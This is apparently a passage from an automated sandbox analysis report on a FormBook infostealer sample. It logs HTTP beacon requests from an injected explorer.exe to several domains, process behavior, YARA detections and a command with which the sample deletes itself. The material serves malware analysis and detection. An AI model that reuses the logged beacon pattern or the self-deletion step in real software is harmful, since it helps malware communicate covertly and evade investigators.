                                                       Jun 11, 2021 16:57:45.640141010 CEST | 1715 | OUT | GET /p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.yunlimall.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                       Jun 11, 2021 16:57:45.838773012 CEST | 1716 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 11 Jun 2021 14:57:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 785
                                                      Connection: close
                                                      Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html>


                                                       Session 1: 192.168.2.5:49719 -> 103.120.12.113:80, process C:\Windows\explorer.exe
                                                       Timestamp | kBytes transferred | Direction | Data
                                                       Jun 11, 2021 16:57:51.679858923 CEST | 1717 | OUT | GET /p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.dmgt4m2g8y2uh.net
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                       Jun 11, 2021 16:57:51.970758915 CEST | 1717 | IN | HTTP/1.1 403 Forbidden
                                                      Date: Fri, 11 Jun 2021 14:57:51 GMT
                                                      Server: Apache
                                                      Vary: Accept-Encoding
                                                      Content-Length: 207
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /p2io/on this server.</p></body></html>


                                                       Session 2: 192.168.2.5:49727 -> 34.102.136.180:80, process C:\Windows\explorer.exe
                                                       Timestamp | kBytes transferred | Direction | Data
                                                       Jun 11, 2021 16:58:02.140011072 CEST | 1786 | OUT | GET /p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.thesoulrevitalist.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                       Jun 11, 2021 16:58:02.278377056 CEST | 2232 | IN | HTTP/1.1 403 Forbidden
                                                      Server: openresty
                                                      Date: Fri, 11 Jun 2021 14:58:02 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 275
                                                      ETag: "60ba412a-113"
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                       Session 3: 192.168.2.5:49728 -> 52.58.78.16:80, process C:\Windows\explorer.exe
                                                       Timestamp | kBytes transferred | Direction | Data
                                                       Jun 11, 2021 16:58:07.403291941 CEST | 6630 | OUT | GET /p2io/?Y8a0dZ=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf4qMx2ahmc0&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.newmopeds.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                       Jun 11, 2021 16:58:07.445677042 CEST | 6630 | IN | HTTP/1.1 410 Gone
                                                      Server: openresty
                                                      Date: Fri, 11 Jun 2021 14:56:44 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='5; url=http://www.newmopeds.com/' />a </head>9 <body>39 You are being redirected to http://www.newmopeds.coma </body>8</html>0


                                                       Session 4: 192.168.2.5:49729 -> 78.31.67.91:80, process C:\Windows\explorer.exe
                                                       Timestamp | kBytes transferred | Direction | Data
                                                       Jun 11, 2021 16:58:12.590209007 CEST | 6632 | OUT | GET /p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.cleanxcare.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                       Jun 11, 2021 16:58:13.496877909 CEST | 6633 | IN | HTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Content-Length: 707
                                                      Date: Fri, 11 Jun 2021 14:58:12 GMT
                                                      Location: https://www.cleanxcare.com/p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Vary: User-Agent
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                       Session 5: 192.168.2.5:49731 -> 148.59.128.71:80, process C:\Windows\explorer.exe
                                                       Timestamp | kBytes transferred | Direction | Data
                                                       Jun 11, 2021 16:58:18.538600922 CEST | 6666 | OUT | GET /p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP HTTP/1.1
                                                      Host: www.hazard-protection.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jun 11, 2021 16:58:18.697585106 CEST | 6668 | IN | HTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Server: Microsoft-IIS/10.0
                                                      X-Powered-By: ASP.NET
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: true
                                                      Access-Control-Allow-Methods: GET, POST, PUT, DELETE
                                                      Access-Control-Allow-Headers: Authorization
                                                      Date: Fri, 11 Jun 2021 14:58:19 GMT
                                                      Connection: close
                                                      Content-Length: 1245
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 
70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div>


                                                      Code Manipulations

                                                      Statistics

                                                      Behavior

                                                      System Behavior

                                                      General

                                                      Start time:16:56:19
                                                      Start date:11/06/2021
                                                      Path:C:\Users\user\Desktop\UOMp9cDcqZ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
                                                      Imagebase:0x6e0000
                                                      File size:993792 bytes
                                                      MD5 hash:15D907E7D9F8286E5053796C9D78FCEC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Start time:16:56:29
                                                      Start date:11/06/2021
                                                      Path:C:\Users\user\Desktop\UOMp9cDcqZ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\UOMp9cDcqZ.exe
                                                      Imagebase:0x860000
                                                      File size:993792 bytes
                                                      MD5 hash:15D907E7D9F8286E5053796C9D78FCEC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Start time:16:56:31
                                                      Start date:11/06/2021
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:
                                                      Imagebase:0x7ff693d90000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:16:56:58
                                                      Start date:11/06/2021
                                                      Path:C:\Windows\SysWOW64\autochk.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\SysWOW64\autochk.exe
                                                      Imagebase:0xd40000
                                                      File size:871424 bytes
                                                      MD5 hash:34236DB574405291498BCD13D20C42EB
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:16:56:59
                                                      Start date:11/06/2021
                                                      Path:C:\Windows\SysWOW64\colorcpl.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                      Imagebase:0x380000
                                                      File size:86528 bytes
                                                      MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Start time:16:57:03
                                                      Start date:11/06/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
                                                      Imagebase:0x8d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:16:57:03
                                                      Start date:11/06/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7ecfc0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Code Analysis